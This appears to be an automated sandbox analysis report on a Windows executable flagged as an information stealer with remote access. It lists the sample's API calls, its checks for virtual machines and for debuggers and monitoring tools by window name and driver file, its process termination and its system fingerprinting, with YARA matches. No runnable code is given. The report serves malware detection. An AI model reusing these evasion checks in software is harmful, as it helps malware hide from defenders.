Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068DF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00681160 GetSystemInfo,ExitProcess, 0_2_00681160
Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2132664415.0000000001452000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00684610 VirtualProtect ?,00000004,00000100,00000000 0_2_00684610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00699BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699AA0 mov eax, dword ptr fs:[00000030h] 0_2_00699AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00697690
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00699790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_006998E0
Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: &CProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C75A8 cpuid 0_2_006C75A8
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00697D20
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00697B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_006979E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00697BC0

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP